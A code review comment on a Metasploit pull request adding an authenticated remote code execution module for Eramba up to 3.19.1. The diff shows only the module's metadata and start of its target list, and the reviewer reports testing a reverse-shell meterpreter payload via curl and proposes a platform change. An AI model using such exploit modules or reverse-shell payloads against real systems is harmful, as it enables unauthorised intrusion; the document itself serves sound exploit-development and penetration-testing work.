modules/exploits/linux/http/eramba_rce.rb

```diff
@@ -0,0 +1,135 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Eramba (up to 3.19.1) Authenticated Remote Code Execution Module',
+        'Description' => %q{
+          This module exploits a remote code execution vulnerability in Eramba.
+          An authenticated user can execute arbitrary commands on the server by
+          exploiting the path parameter in the download-test-pdf endpoint.
+          Eramba debug mode has to be enabled.
+        },
+        'Author' => [
+          'Trovent Security GmbH',
+          'Sergey Makarov',        # vulnerability discovery and exploit
+          'Stefan Pietsch',        # CVE and Advisory
+          'Niklas Rubel', # MSF module
+          'msutovsky-r7' # MSF module
+        ],
+        'License' => MSF_LICENSE,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [IOC_IN_LOGS],
+          'Reliability' => []
+        },
+        'Platform' => ['unix', 'linux'],
+        'Arch' => [ARCH_CMD],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
```

Comment:
This is filtering out fetch payloads. The docker container has curl and wget installed and I was able to test `cmd/linux/http/x64/meterpreter/reverse_tcp` using curl but had to make these changes:

```suggestion
        'Targets' => [
          [
            'Command',
            {
              'Platform' => ['unix', 'linux'],
              'Arch' => ARCH_CMD,
```